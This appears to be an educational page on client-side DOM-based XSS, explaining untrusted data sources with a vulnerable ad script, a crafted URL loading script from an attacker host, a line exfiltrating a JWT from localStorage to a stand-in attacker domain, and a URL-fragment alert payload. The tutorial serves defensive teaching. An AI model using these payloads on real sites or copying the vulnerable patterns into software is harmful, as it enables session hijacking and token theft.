Client XSS
Per definition "Client XSS vulnerability occurs when untrusted user supplied data is used to update the DOM with an unsafe JavaScript call. A JavaScript call is considered unsafe if it can be used to introduce valid JavaScript into the DOM.". (source).
The "untrusted user supplied data" has multiple sources such as the DOM itself,
the URL e.g. a query string parameter or the fragment or even from a server
request. Client side store locations like Cookies
or Local Storage
are also
potential sources of XSS payloads.
As an example, consider the following script used to display ads on a website:
document.write('<script type="text/JavaScript" src="' + (location.search.split('req=')[1] || '') + '"></scr'+'ipt>');
Since the location.search.split
is not properly escaped, the req
parameter
can be manipulated by an attacker to retrieve malicious JavaScript from a
location he/she is in control of, injecting it into the web page of which the
victim is visiting.
http://www.example.com/?req=https://www.attacker.com/poc/xss.js
To perform this attack, an attacker crafts an URL like the one above, sending it
to the victim. Upon clicking it, the https://www.attacker.com/poc/xss.js
script is requested by the ad snippet, making it run in the www.example.com
context.
This could be the initial step of a Session Hijacking attack as an
attacker's script may have access to the session cookie (if it was not properly
set as httpOnly
) or to the localStorage
where a JSON Web Token (JWT) may be
found:
(new Image).src = '//attacer.com?jwt='+localStorage.get('JWT');
The sample above is a common example of how to exfiltrate data. Bypassing the
Same Origin Policy as the JWT
value read from localStorage
is sent as
part of the URL from where an image was supposed to load.
As we stated before, there are many "untrusted data" sources. Some client-side frameworks use the URL fragment to identify resources or application states; although the fragment is part of the URL, it is not sent to the sever.
The following script is very simple and for demonstration purposes only, but encompasses the concept of URL fragment as source of untrusted data. Assuming that the following script is somewhere in the target page:
<script>
x=location.hash.slice(1);
document.write(x)
</script>
Thus the following URL would trigger the famous alert(1)
modal.
http://example.com/fragment.html#<script>alert(1)</script>
To know how to prevent XSS in general, please follow the guidelines provided in How to prevent XSS section.